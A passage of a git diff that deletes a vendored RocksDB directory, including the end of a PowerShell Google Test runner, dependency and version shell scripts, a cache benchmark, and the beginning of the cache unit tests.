-            Write-Warning "$test case is excluded"
-            continue
-        }
-
-        $test_log = $test -replace '[\./]','_'
-        $test_log += ".log"
-        $log_path = -join ($LogFolder, $test_log)
-
-        # Add to a hashtable
-        $HashTable.Add($test, $log_path);
-      }
-    }
-}
-
-# The function removes trailing .exe siffix if any,
-# creates a name for the log file
-# Then adds the test name if it was not excluded into
-# a HashTable in a form of test_name -> log_path
-function MakeAndAdd([string]$token, $HashTable) {
-
-    $test_name = $token -replace '.exe$', ''
-    $log_name =  -join ($test_name, ".log")
-    $log_path = -join ($LogFolder, $log_name)
-    $HashTable.Add($test_name, $log_path)
-}
-
-# This function takes a list of Suites to run
-# Lists all the test cases in each of the suite
-# and populates HashOfHashes
-# Ordered by suite(exe) @{ Exe = @{ TestCase = LogName }}
-function ProcessSuites($ListOfSuites, $HashOfHashes) {
-
-  $suite_list = $ListOfSuites
-  # Problem: if you run --gtest_list_tests on
-  # a non Google Test executable then it will start executing
-  # and we will get nowhere
-  ForEach($suite in $suite_list) {
-
-    if($RunOnly.Contains($suite)) {
-      Write-Warning "$suite is excluded from running as Google test suite"
-      continue
-    }
-
-    if($EnableJE) {
-      $suite += "_je"
-    }
-
-    $Cases = [ordered]@{}
-    $Cases.Clear()
-    $suite_exe = -Join ($BinariesFolder, $suite)
-    ExtractTestCases -GTestExe $suite_exe -HashTable $Cases
-    if($Cases.Count -gt 0) {
-      $HashOfHashes.Add($suite, $Cases);
-    }
-  }
-
-  # Make logs and run
-  if($CasesToRun.Count -lt 1) {
-     Write-Error "Failed to extract tests from $SuiteRun"
-     exit 1
-  }
-
-}
-
-# This will contain all test executables to run
-
-# Hash table that contains all non suite
-# Test executable to run
-$TestExes = [ordered]@{}
-
-# Check for test exe that are not
-# Google Test Suites
-# Since this is explicitely mentioned it is not subject
-# for exclusions
-if($Run -ne "") {
-
-  $test_list = $Run -split ' '
-
-  ForEach($t in $test_list) {
-
-    if($EnableJE) {
-      $t += "_je"
-    }
-
-    MakeAndAdd -token $t -HashTable $TestExes
-  }
-
-  if($TestExes.Count -lt 1) {
-     Write-Error "Failed to extract tests from $Run"
-     exit 1
-  }
-}
-
-# Ordered by exe @{ Exe = @{ TestCase = LogName }}
-$CasesToRun = [ordered]@{}
-
-if($SuiteRun -ne "") {
-  $suite_list = $SuiteRun -split ' '
-  ProcessSuites -ListOfSuites $suite_list -HashOfHashes $CasesToRun
-}
-
-if($RunAll) {
-# Discover all the test binaries
-  if($EnableJE) {
-    $pattern = "*_test_je.exe"
-  } else {
-    $pattern = "*_test.exe"
-  }
-
-
-  $search_path = -join ($BinariesFolder, $pattern)
-  Write-Host "Binaries Search Path: $search_path"
-
-  $ListOfExe = @()
-  dir -Path $search_path | ForEach-Object {
-     $ListOfExe += ($_.Name)     
-  }
-
-  # Exclude those in RunOnly from running as suites
-  $ListOfSuites = @()
-  ForEach($e in $ListOfExe) {
-
-    $e = $e -replace '.exe$', ''
-    $bare_name = $e -replace '_je$', ''
-
-    if($ExcludeExesSet.Contains($bare_name)) {
-      Write-Warning "Test $e is excluded"
-      continue
-    }
-
-    if($RunOnly.Contains($bare_name)) {
-      MakeAndAdd -token $e -HashTable $TestExes
-    } else {
-      $ListOfSuites += $bare_name
-    }
-  }
-
-  ProcessSuites -ListOfSuites $ListOfSuites -HashOfHashes $CasesToRun
-}
-
-
-Write-Host "Attempting to start: $NumTestsToStart tests"
-
-# Invoke a test with a filter and redirect all output
-$InvokeTestCase = {
-    param($exe, $test, $log);
-    &$exe --gtest_filter=$test > $log 2>&1
-}
-
-# Invoke all tests and redirect output
-$InvokeTestAsync = {
-    param($exe, $log)
-    &$exe > $log 2>&1
-}
-
-# Hash that contains tests to rerun if any failed
-# Those tests will be rerun sequentially
-# $Rerun = [ordered]@{}
-# Test limiting factor here
-[int]$count = 0
-# Overall status
-[bool]$success = $true;
-
-function RunJobs($Suites, $TestCmds, [int]$ConcurrencyVal)
-{
-    # Array to wait for any of the running jobs
-    $jobs = @()
-    # Hash JobToLog
-    $JobToLog = @{}
-
-    # Wait for all to finish and get the results
-    while(($JobToLog.Count -gt 0) -or
-          ($TestCmds.Count -gt 0) -or 
-           ($Suites.Count -gt 0)) {
-
-        # Make sure we have maximum concurrent jobs running if anything
-        # and the $Limit either not set or allows to proceed
-        while(($JobToLog.Count -lt $ConcurrencyVal) -and
-              ((($TestCmds.Count -gt 0) -or ($Suites.Count -gt 0)) -and
-              (($Limit -lt 0) -or ($count -lt $Limit)))) {
-
-            # We always favore suites to run if available
-            [string]$exe_name = ""
-            [string]$log_path = ""
-            $Cases = @{}
-
-            if($Suites.Count -gt 0) {
-              # Will the first one
-              ForEach($e in $Suites.Keys) {
-                $exe_name = $e
-                $Cases = $Suites[$e]
-                break
-              }
-              [string]$test_case = ""
-              [string]$log_path = ""
-              ForEach($c in $Cases.Keys) {
-                 $test_case = $c
-                 $log_path = $Cases[$c]
-                 break
-              }
-
-              Write-Host "Starting $exe_name::$test_case"
-              [string]$Exe =  -Join ($BinariesFolder, $exe_name)
-              $job = Start-Job -Name "$exe_name::$test_case" -ArgumentList @($Exe,$test_case,$log_path) -ScriptBlock $InvokeTestCase
-              $JobToLog.Add($job, $log_path)
-
-              $Cases.Remove($test_case)
-              if($Cases.Count -lt 1) {
-                $Suites.Remove($exe_name)
-              }
-
-            } elseif ($TestCmds.Count -gt 0) {
-
-               ForEach($e in $TestCmds.Keys) {
-                 $exe_name = $e
-                 $log_path = $TestCmds[$e]
-                 break
-               }
-
-              [string]$Exe =  -Join ($BinariesFolder, $exe_name)
-              $job = Start-Job -Name $exe_name -ScriptBlock $InvokeTestAsync -ArgumentList @($Exe,$log_path)
-              $JobToLog.Add($job, $log_path)
-
-              $TestCmds.Remove($exe_name)
-
-            } else {
-                Write-Error "In the job loop but nothing to run"
-                exit 1
-            }
-
-            ++$count
-        } # End of Job starting loop
-
-        if($JobToLog.Count -lt 1) {
-          break
-        }
-
-        $jobs = @()
-        foreach($k in $JobToLog.Keys) { $jobs += $k }
-
-        $completed = Wait-Job -Job $jobs -Any
-        $log = $JobToLog[$completed]
-        $JobToLog.Remove($completed)
-
-        $message = -join @($completed.Name, " State: ", ($completed.State))
-
-        $log_content = @(Get-Content $log)
-
-        if($completed.State -ne "Completed") {
-            $success = $false
-            Write-Warning $message
-            $log_content | Write-Warning
-        } else {
-            # Scan the log. If we find PASSED and no occurrence of FAILED
-            # then it is a success
-            [bool]$pass_found = $false
-            ForEach($l in $log_content) {
-
-                if(($l -match "^\[\s+FAILED") -or
-                   ($l -match "Assertion failed:")) {
-                    $pass_found = $false
-                    break
-                }
-
-                if(($l -match "^\[\s+PASSED") -or
-                   ($l -match " : PASSED$") -or
-                    ($l -match "^PASS$") -or   # Special c_test case
-                    ($l -match "Passed all tests!") ) {
-                    $pass_found = $true
-                }
-            }
-
-            if(!$pass_found) {
-                $success = $false;
-                Write-Warning $message
-                $log_content | Write-Warning
-            } else {
-                Write-Host $message
-            }
-        }
-
-        # Remove cached job info from the system
-        # Should be no output
-        Receive-Job -Job $completed | Out-Null
-    }
-}
-
-RunJobs -Suites $CasesToRun -TestCmds $TestExes -ConcurrencyVal $Concurrency
-
-$EndDate = (Get-Date)
-
-New-TimeSpan -Start $StartDate -End $EndDate | 
-  ForEach-Object { 
-    "Elapsed time: {0:g}" -f $_
-  }
-
-
-if(!$success) {
-# This does not succeed killing off jobs quick
-# So we simply exit
-#    Remove-Job -Job $jobs -Force
-# indicate failure using this exit code
-    exit 1
- }
-
- exit 0
-
- 
diff --git a/thirdparty/rocksdb/build_tools/update_dependencies.sh b/thirdparty/rocksdb/build_tools/update_dependencies.sh
deleted file mode 100755
index c7b9932..0000000
--- a/thirdparty/rocksdb/build_tools/update_dependencies.sh
+++ /dev/null
@@ -1,131 +0,0 @@
-#!/bin/sh
-#
-# Update dependencies.sh file with the latest avaliable versions
-
-BASEDIR=$(dirname $0)
-OUTPUT=""
-
-function log_variable()
-{
-  echo "$1=${!1}" >> "$OUTPUT"
-}
-
-
-TP2_LATEST="/mnt/vol/engshare/fbcode/third-party2"
-## $1 => lib name
-## $2 => lib version (if not provided, will try to pick latest)
-## $3 => platform (if not provided, will try to pick latest gcc)
-##
-## get_lib_base will set a variable named ${LIB_NAME}_BASE to the lib location
-function get_lib_base()
-{
-  local lib_name=$1
-  local lib_version=$2
-  local lib_platform=$3
-
-  local result="$TP2_LATEST/$lib_name/"
-  
-  # Lib Version
-  if [ -z "$lib_version" ] || [ "$lib_version" = "LATEST" ]; then
-    # version is not provided, use latest
-    result=`ls -dr1v $result/*/ | head -n1`
-  else
-    result="$result/$lib_version/"
-  fi
-  
-  # Lib Platform
-  if [ -z "$lib_platform" ]; then
-    # platform is not provided, use latest gcc
-    result=`ls -dr1v $result/gcc-*[^fb]/ | head -n1`
-  else
-    result="$result/$lib_platform/"
-  fi
-  
-  result=`ls -1d $result/*/ | head -n1`
-  
-  # lib_name => LIB_NAME_BASE
-  local __res_var=${lib_name^^}"_BASE"
-  __res_var=`echo $__res_var | tr - _`
-  # LIB_NAME_BASE=$result
-  eval $__res_var=`readlink -f $result`
-  
-  log_variable $__res_var
-}
-
-###########################################################
-#                   5.x dependencies                      #
-###########################################################
-
-OUTPUT="$BASEDIR/dependencies.sh"
-
-rm -f "$OUTPUT"
-touch "$OUTPUT"
-
-echo "Writing dependencies to $OUTPUT"
-
-# Compilers locations
-GCC_BASE=`readlink -f $TP2_LATEST/gcc/5.x/centos6-native/*/`
-CLANG_BASE=`readlink -f $TP2_LATEST/llvm-fb/stable/centos6-native/*/`
-
-log_variable GCC_BASE
-log_variable CLANG_BASE
-
-# Libraries locations
-get_lib_base libgcc     5.x
-get_lib_base glibc      2.23
-get_lib_base snappy     LATEST gcc-5-glibc-2.23
-get_lib_base zlib       LATEST
-get_lib_base bzip2      LATEST
-get_lib_base lz4        LATEST
-get_lib_base zstd       LATEST
-get_lib_base gflags     LATEST
-get_lib_base jemalloc   LATEST
-get_lib_base numa       LATEST
-get_lib_base libunwind  LATEST
-get_lib_base tbb        4.0_update2 gcc-5-glibc-2.23
-
-get_lib_base kernel-headers LATEST 
-get_lib_base binutils   LATEST centos6-native 
-get_lib_base valgrind   3.10.0 gcc-5-glibc-2.23
-get_lib_base lua        5.2.3 gcc-5-glibc-2.23
-
-git diff $OUTPUT
-
-###########################################################
-#                   4.8.1 dependencies                    #
-###########################################################
-
-OUTPUT="$BASEDIR/dependencies_4.8.1.sh"
-
-rm -f "$OUTPUT"
-touch "$OUTPUT"
-
-echo "Writing 4.8.1 dependencies to $OUTPUT"
-
-# Compilers locations
-GCC_BASE=`readlink -f $TP2_LATEST/gcc/4.8.1/centos6-native/*/`
-CLANG_BASE=`readlink -f $TP2_LATEST/llvm-fb/stable/centos6-native/*/`
-
-log_variable GCC_BASE
-log_variable CLANG_BASE
-
-# Libraries locations
-get_lib_base libgcc     4.8.1  gcc-4.8.1-glibc-2.17
-get_lib_base glibc      2.17   gcc-4.8.1-glibc-2.17  
-get_lib_base snappy     LATEST gcc-4.8.1-glibc-2.17
-get_lib_base zlib       LATEST gcc-4.8.1-glibc-2.17
-get_lib_base bzip2      LATEST gcc-4.8.1-glibc-2.17
-get_lib_base lz4        LATEST gcc-4.8.1-glibc-2.17
-get_lib_base zstd       LATEST gcc-4.8.1-glibc-2.17
-get_lib_base gflags     LATEST gcc-4.8.1-glibc-2.17
-get_lib_base jemalloc   LATEST gcc-4.8.1-glibc-2.17
-get_lib_base numa       LATEST gcc-4.8.1-glibc-2.17
-get_lib_base libunwind  LATEST gcc-4.8.1-glibc-2.17
-get_lib_base tbb        4.0_update2 gcc-4.8.1-glibc-2.17
-
-get_lib_base kernel-headers LATEST gcc-4.8.1-glibc-2.17 
-get_lib_base binutils   LATEST centos6-native 
-get_lib_base valgrind   3.8.1  gcc-4.8.1-glibc-2.17
-get_lib_base lua        5.2.3 centos6-native
-
-git diff $OUTPUT
diff --git a/thirdparty/rocksdb/build_tools/version.sh b/thirdparty/rocksdb/build_tools/version.sh
deleted file mode 100755
index f3ca98c..0000000
--- a/thirdparty/rocksdb/build_tools/version.sh
+++ /dev/null
@@ -1,22 +0,0 @@
-#!/bin/sh
-if [ "$#" = "0" ]; then
-  echo "Usage: $0 major|minor|patch|full"
-  exit 1
-fi
-
-if [ "$1" = "major" ]; then
-  cat include/rocksdb/version.h  | grep MAJOR | head -n1 | awk '{print $3}'
-fi
-if [ "$1" = "minor" ]; then
-  cat include/rocksdb/version.h  | grep MINOR | head -n1 | awk '{print $3}'
-fi
-if [ "$1" = "patch" ]; then
-  cat include/rocksdb/version.h  | grep PATCH | head -n1 | awk '{print $3}'
-fi
-if [ "$1" = "full" ]; then
-  awk '/#define ROCKSDB/ { env[$2] = $3 }
-       END { printf "%s.%s.%s\n", env["ROCKSDB_MAJOR"],
-                                  env["ROCKSDB_MINOR"],
-                                  env["ROCKSDB_PATCH"] }'  \
-      include/rocksdb/version.h
-fi
diff --git a/thirdparty/rocksdb/cache/cache_bench.cc b/thirdparty/rocksdb/cache/cache_bench.cc
deleted file mode 100644
index 16c2ced..0000000
--- a/thirdparty/rocksdb/cache/cache_bench.cc
+++ /dev/null
@@ -1,284 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <inttypes.h>
-#include <sys/types.h>
-#include <stdio.h>
-#include <gflags/gflags.h>
-
-#include "rocksdb/db.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "port/port.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-
-using GFLAGS::ParseCommandLineFlags;
-
-static const uint32_t KB = 1024;
-
-DEFINE_int32(threads, 16, "Number of concurrent threads to run.");
-DEFINE_int64(cache_size, 8 * KB * KB,
-             "Number of bytes to use as a cache of uncompressed data.");
-DEFINE_int32(num_shard_bits, 4, "shard_bits.");
-
-DEFINE_int64(max_key, 1 * KB * KB * KB, "Max number of key to place in cache");
-DEFINE_uint64(ops_per_thread, 1200000, "Number of operations per thread.");
-
-DEFINE_bool(populate_cache, false, "Populate cache before operations");
-DEFINE_int32(insert_percent, 40,
-             "Ratio of insert to total workload (expressed as a percentage)");
-DEFINE_int32(lookup_percent, 50,
-             "Ratio of lookup to total workload (expressed as a percentage)");
-DEFINE_int32(erase_percent, 10,
-             "Ratio of erase to total workload (expressed as a percentage)");
-
-DEFINE_bool(use_clock_cache, false, "");
-
-namespace rocksdb {
-
-class CacheBench;
-namespace {
-void deleter(const Slice& key, void* value) {
-    delete reinterpret_cast<char *>(value);
-}
-
-// State shared by all concurrent executions of the same benchmark.
-class SharedState {
- public:
-  explicit SharedState(CacheBench* cache_bench)
-      : cv_(&mu_),
-        num_threads_(FLAGS_threads),
-        num_initialized_(0),
-        start_(false),
-        num_done_(0),
-        cache_bench_(cache_bench) {
-  }
-
-  ~SharedState() {}
-
-  port::Mutex* GetMutex() {
-    return &mu_;
-  }
-
-  port::CondVar* GetCondVar() {
-    return &cv_;
-  }
-
-  CacheBench* GetCacheBench() const {
-    return cache_bench_;
-  }
-
-  void IncInitialized() {
-    num_initialized_++;
-  }
-
-  void IncDone() {
-    num_done_++;
-  }
-
-  bool AllInitialized() const {
-    return num_initialized_ >= num_threads_;
-  }
-
-  bool AllDone() const {
-    return num_done_ >= num_threads_;
-  }
-
-  void SetStart() {
-    start_ = true;
-  }
-
-  bool Started() const {
-    return start_;
-  }
-
- private:
-  port::Mutex mu_;
-  port::CondVar cv_;
-
-  const uint64_t num_threads_;
-  uint64_t num_initialized_;
-  bool start_;
-  uint64_t num_done_;
-
-  CacheBench* cache_bench_;
-};
-
-// Per-thread state for concurrent executions of the same benchmark.
-struct ThreadState {
-  uint32_t tid;
-  Random rnd;
-  SharedState* shared;
-
-  ThreadState(uint32_t index, SharedState* _shared)
-      : tid(index), rnd(1000 + index), shared(_shared) {}
-};
-}  // namespace
-
-class CacheBench {
- public:
-  CacheBench() : num_threads_(FLAGS_threads) {
-    if (FLAGS_use_clock_cache) {
-      cache_ = NewClockCache(FLAGS_cache_size, FLAGS_num_shard_bits);
-      if (!cache_) {
-        fprintf(stderr, "Clock cache not supported.\n");
-        exit(1);
-      }
-    } else {
-      cache_ = NewLRUCache(FLAGS_cache_size, FLAGS_num_shard_bits);
-    }
-  }
-
-  ~CacheBench() {}
-
-  void PopulateCache() {
-    Random rnd(1);
-    for (int64_t i = 0; i < FLAGS_cache_size; i++) {
-      uint64_t rand_key = rnd.Next() % FLAGS_max_key;
-      // Cast uint64* to be char*, data would be copied to cache
-      Slice key(reinterpret_cast<char*>(&rand_key), 8);
-      // do insert
-      cache_->Insert(key, new char[10], 1, &deleter);
-    }
-  }
-
-  bool Run() {
-    rocksdb::Env* env = rocksdb::Env::Default();
-
-    PrintEnv();
-    SharedState shared(this);
-    std::vector<ThreadState*> threads(num_threads_);
-    for (uint32_t i = 0; i < num_threads_; i++) {
-      threads[i] = new ThreadState(i, &shared);
-      env->StartThread(ThreadBody, threads[i]);
-    }
-    {
-      MutexLock l(shared.GetMutex());
-      while (!shared.AllInitialized()) {
-        shared.GetCondVar()->Wait();
-      }
-      // Record start time
-      uint64_t start_time = env->NowMicros();
-
-      // Start all threads
-      shared.SetStart();
-      shared.GetCondVar()->SignalAll();
-
-      // Wait threads to complete
-      while (!shared.AllDone()) {
-        shared.GetCondVar()->Wait();
-      }
-
-      // Record end time
-      uint64_t end_time = env->NowMicros();
-      double elapsed = static_cast<double>(end_time - start_time) * 1e-6;
-      uint32_t qps = static_cast<uint32_t>(
-          static_cast<double>(FLAGS_threads * FLAGS_ops_per_thread) / elapsed);
-      fprintf(stdout, "Complete in %.3f s; QPS = %u\n", elapsed, qps);
-    }
-    return true;
-  }
-
- private:
-  std::shared_ptr<Cache> cache_;
-  uint32_t num_threads_;
-
-  static void ThreadBody(void* v) {
-    ThreadState* thread = reinterpret_cast<ThreadState*>(v);
-    SharedState* shared = thread->shared;
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncInitialized();
-      if (shared->AllInitialized()) {
-        shared->GetCondVar()->SignalAll();
-      }
-      while (!shared->Started()) {
-        shared->GetCondVar()->Wait();
-      }
-    }
-    thread->shared->GetCacheBench()->OperateCache(thread);
-
-    {
-      MutexLock l(shared->GetMutex());
-      shared->IncDone();
-      if (shared->AllDone()) {
-        shared->GetCondVar()->SignalAll();
-      }
-    }
-  }
-
-  void OperateCache(ThreadState* thread) {
-    for (uint64_t i = 0; i < FLAGS_ops_per_thread; i++) {
-      uint64_t rand_key = thread->rnd.Next() % FLAGS_max_key;
-      // Cast uint64* to be char*, data would be copied to cache
-      Slice key(reinterpret_cast<char*>(&rand_key), 8);
-      int32_t prob_op = thread->rnd.Uniform(100);
-      if (prob_op >= 0 && prob_op < FLAGS_insert_percent) {
-        // do insert
-        cache_->Insert(key, new char[10], 1, &deleter);
-      } else if (prob_op -= FLAGS_insert_percent &&
-                 prob_op < FLAGS_lookup_percent) {
-        // do lookup
-        auto handle = cache_->Lookup(key);
-        if (handle) {
-          cache_->Release(handle);
-        }
-      } else if (prob_op -= FLAGS_lookup_percent &&
-                 prob_op < FLAGS_erase_percent) {
-        // do erase
-        cache_->Erase(key);
-      }
-    }
-  }
-
-  void PrintEnv() const {
-    printf("RocksDB version     : %d.%d\n", kMajorVersion, kMinorVersion);
-    printf("Number of threads   : %d\n", FLAGS_threads);
-    printf("Ops per thread      : %" PRIu64 "\n", FLAGS_ops_per_thread);
-    printf("Cache size          : %" PRIu64 "\n", FLAGS_cache_size);
-    printf("Num shard bits      : %d\n", FLAGS_num_shard_bits);
-    printf("Max key             : %" PRIu64 "\n", FLAGS_max_key);
-    printf("Populate cache      : %d\n", FLAGS_populate_cache);
-    printf("Insert percentage   : %d%%\n", FLAGS_insert_percent);
-    printf("Lookup percentage   : %d%%\n", FLAGS_lookup_percent);
-    printf("Erase percentage    : %d%%\n", FLAGS_erase_percent);
-    printf("----------------------------\n");
-  }
-};
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  if (FLAGS_threads <= 0) {
-    fprintf(stderr, "threads number <= 0\n");
-    exit(1);
-  }
-
-  rocksdb::CacheBench bench;
-  if (FLAGS_populate_cache) {
-    bench.PopulateCache();
-  }
-  if (bench.Run()) {
-    return 0;
-  } else {
-    return 1;
-  }
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/cache/cache_test.cc b/thirdparty/rocksdb/cache/cache_test.cc
deleted file mode 100644
index 8e24122..0000000
--- a/thirdparty/rocksdb/cache/cache_test.cc
+++ /dev/null
@@ -1,703 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/cache.h"
-
-#include <forward_list>
-#include <functional>
-#include <iostream>
-#include <string>
-#include <vector>
-#include "cache/clock_cache.h"
-#include "cache/lru_cache.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-// Conversions between numeric keys/values and the types expected by Cache.
-static std::string EncodeKey(int k) {
-  std::string result;
-  PutFixed32(&result, k);
-  return result;
-}
-static int DecodeKey(const Slice& k) {
-  assert(k.size() == 4);
-  return DecodeFixed32(k.data());
-}
-static void* EncodeValue(uintptr_t v) { return reinterpret_cast<void*>(v); }
-static int DecodeValue(void* v) {
-  return static_cast<int>(reinterpret_cast<uintptr_t>(v));
-}
-
-const std::string kLRU = "lru";
-const std::string kClock = "clock";
-
-void dumbDeleter(const Slice& key, void* value) {}
-
-void eraseDeleter(const Slice& key, void* value) {
-  Cache* cache = reinterpret_cast<Cache*>(value);
-  cache->Erase("foo");
-}
-
-class CacheTest : public testing::TestWithParam<std::string> {
- public:
-  static CacheTest* current_;
-
-  static void Deleter(const Slice& key, void* v) {
-    current_->deleted_keys_.push_back(DecodeKey(key));
-    current_->deleted_values_.push_back(DecodeValue(v));
-  }
-
-  static const int kCacheSize = 1000;
-  static const int kNumShardBits = 4;
-
-  static const int kCacheSize2 = 100;
-  static const int kNumShardBits2 = 2;
-
-  std::vector<int> deleted_keys_;
-  std::vector<int> deleted_values_;
-  shared_ptr<Cache> cache_;
-  shared_ptr<Cache> cache2_;
-
-  CacheTest()
-      : cache_(NewCache(kCacheSize, kNumShardBits, false)),
-        cache2_(NewCache(kCacheSize2, kNumShardBits2, false)) {
-    current_ = this;
-  }
-
-  ~CacheTest() {
-  }
-
-  std::shared_ptr<Cache> NewCache(size_t capacity) {
-    auto type = GetParam();
-    if (type == kLRU) {
-      return NewLRUCache(capacity);
-    }
-    if (type == kClock) {
-      return NewClockCache(capacity);
-    }
-    return nullptr;
-  }
-
-  std::shared_ptr<Cache> NewCache(size_t capacity, int num_shard_bits,
-                                  bool strict_capacity_limit) {
-    auto type = GetParam();
-    if (type == kLRU) {
-      return NewLRUCache(capacity, num_shard_bits, strict_capacity_limit);
-    }
-    if (type == kClock) {
-      return NewClockCache(capacity, num_shard_bits, strict_capacity_limit);
-    }
-    return nullptr;
-  }
-
-  int Lookup(shared_ptr<Cache> cache, int key) {
-    Cache::Handle* handle = cache->Lookup(EncodeKey(key));
-    const int r = (handle == nullptr) ? -1 : DecodeValue(cache->Value(handle));
-    if (handle != nullptr) {
-      cache->Release(handle);
-    }
-    return r;
-  }
-
-  void Insert(shared_ptr<Cache> cache, int key, int value, int charge = 1) {
-    cache->Insert(EncodeKey(key), EncodeValue(value), charge,
-                  &CacheTest::Deleter);
-  }
-
-  void Erase(shared_ptr<Cache> cache, int key) {
-    cache->Erase(EncodeKey(key));
-  }
-
-
-  int Lookup(int key) {
-    return Lookup(cache_, key);
-  }
-
-  void Insert(int key, int value, int charge = 1) {
-    Insert(cache_, key, value, charge);
-  }
-
-  void Erase(int key) {
-    Erase(cache_, key);
-  }
-
-  int Lookup2(int key) {
-    return Lookup(cache2_, key);
-  }
-
-  void Insert2(int key, int value, int charge = 1) {
-    Insert(cache2_, key, value, charge);
-  }
-
-  void Erase2(int key) {
-    Erase(cache2_, key);
-  }
-};
-CacheTest* CacheTest::current_;
-
-TEST_P(CacheTest, UsageTest) {
-  // cache is shared_ptr and will be automatically cleaned up.
-  const uint64_t kCapacity = 100000;
-  auto cache = NewCache(kCapacity, 8, false);
-
-  size_t usage = 0;
-  char value[10] = "abcdef";
-  // make sure everything will be cached
-  for (int i = 1; i < 100; ++i) {
-    std::string key(i, 'a');
-    auto kv_size = key.size() + 5;
-    cache->Insert(key, reinterpret_cast<void*>(value), kv_size, dumbDeleter);
-    usage += kv_size;
-    ASSERT_EQ(usage, cache->GetUsage());
-  }
-
-  // make sure the cache will be overloaded
-  for (uint64_t i = 1; i < kCapacity; ++i) {
-    auto key = ToString(i);
-    cache->Insert(key, reinterpret_cast<void*>(value), key.size() + 5,
-                  dumbDeleter);
-  }
-
-  // the usage should be close to the capacity
-  ASSERT_GT(kCapacity, cache->GetUsage());
-  ASSERT_LT(kCapacity * 0.95, cache->GetUsage());
-}
-
-TEST_P(CacheTest, PinnedUsageTest) {
-  // cache is shared_ptr and will be automatically cleaned up.
-  const uint64_t kCapacity = 100000;
-  auto cache = NewCache(kCapacity, 8, false);
-
-  size_t pinned_usage = 0;
-  char value[10] = "abcdef";
-
-  std::forward_list<Cache::Handle*> unreleased_handles;
-
-  // Add entries. Unpin some of them after insertion. Then, pin some of them
-  // again. Check GetPinnedUsage().
-  for (int i = 1; i < 100; ++i) {
-    std::string key(i, 'a');
-    auto kv_size = key.size() + 5;
-    Cache::Handle* handle;
-    cache->Insert(key, reinterpret_cast<void*>(value), kv_size, dumbDeleter,
-                  &handle);
-    pinned_usage += kv_size;
-    ASSERT_EQ(pinned_usage, cache->GetPinnedUsage());
-    if (i % 2 == 0) {
-      cache->Release(handle);
-      pinned_usage -= kv_size;
-      ASSERT_EQ(pinned_usage, cache->GetPinnedUsage());
-    } else {
-      unreleased_handles.push_front(handle);
-    }
-    if (i % 3 == 0) {
-      unreleased_handles.push_front(cache->Lookup(key));
-      // If i % 2 == 0, then the entry was unpinned before Lookup, so pinned
-      // usage increased
-      if (i % 2 == 0) {
-        pinned_usage += kv_size;
-      }
-      ASSERT_EQ(pinned_usage, cache->GetPinnedUsage());
-    }
-  }
-
-  // check that overloading the cache does not change the pinned usage
-  for (uint64_t i = 1; i < 2 * kCapacity; ++i) {
-    auto key = ToString(i);
-    cache->Insert(key, reinterpret_cast<void*>(value), key.size() + 5,
-                  dumbDeleter);
-  }
-  ASSERT_EQ(pinned_usage, cache->GetPinnedUsage());
-
-  // release handles for pinned entries to prevent memory leaks
-  for (auto handle : unreleased_handles) {
-    cache->Release(handle);
-  }
-}
-
-TEST_P(CacheTest, HitAndMiss) {
-  ASSERT_EQ(-1, Lookup(100));
-
-  Insert(100, 101);
-  ASSERT_EQ(101, Lookup(100));
-  ASSERT_EQ(-1,  Lookup(200));
-  ASSERT_EQ(-1,  Lookup(300));
-
-  Insert(200, 201);
-  ASSERT_EQ(101, Lookup(100));
-  ASSERT_EQ(201, Lookup(200));
-  ASSERT_EQ(-1,  Lookup(300));
-
-  Insert(100, 102);
-  ASSERT_EQ(102, Lookup(100));
-  ASSERT_EQ(201, Lookup(200));
-  ASSERT_EQ(-1,  Lookup(300));
-
-  ASSERT_EQ(1U, deleted_keys_.size());
-  ASSERT_EQ(100, deleted_keys_[0]);
-  ASSERT_EQ(101, deleted_values_[0]);
-}
-
-TEST_P(CacheTest, InsertSameKey) {
-  Insert(1, 1);
-  Insert(1, 2);
-  ASSERT_EQ(2, Lookup(1));
-}
-
-TEST_P(CacheTest, Erase) {
-  Erase(200);
-  ASSERT_EQ(0U, deleted_keys_.size());
-
-  Insert(100, 101);
-  Insert(200, 201);
-  Erase(100);
-  ASSERT_EQ(-1,  Lookup(100));
-  ASSERT_EQ(201, Lookup(200));
-  ASSERT_EQ(1U, deleted_keys_.size());
-  ASSERT_EQ(100, deleted_keys_[0]);
-  ASSERT_EQ(101, deleted_values_[0]);
-
-  Erase(100);
-  ASSERT_EQ(-1,  Lookup(100));
-  ASSERT_EQ(201, Lookup(200));
-  ASSERT_EQ(1U, deleted_keys_.size());
-}
-
-TEST_P(CacheTest, EntriesArePinned) {
-  Insert(100, 101);
-  Cache::Handle* h1 = cache_->Lookup(EncodeKey(100));
-  ASSERT_EQ(101, DecodeValue(cache_->Value(h1)));
-  ASSERT_EQ(1U, cache_->GetUsage());
-
-  Insert(100, 102);
-  Cache::Handle* h2 = cache_->Lookup(EncodeKey(100));
-  ASSERT_EQ(102, DecodeValue(cache_->Value(h2)));
-  ASSERT_EQ(0U, deleted_keys_.size());
-  ASSERT_EQ(2U, cache_->GetUsage());
-
-  cache_->Release(h1);
-  ASSERT_EQ(1U, deleted_keys_.size());
-  ASSERT_EQ(100, deleted_keys_[0]);
-  ASSERT_EQ(101, deleted_values_[0]);
-  ASSERT_EQ(1U, cache_->GetUsage());
-
-  Erase(100);
-  ASSERT_EQ(-1, Lookup(100));
-  ASSERT_EQ(1U, deleted_keys_.size());
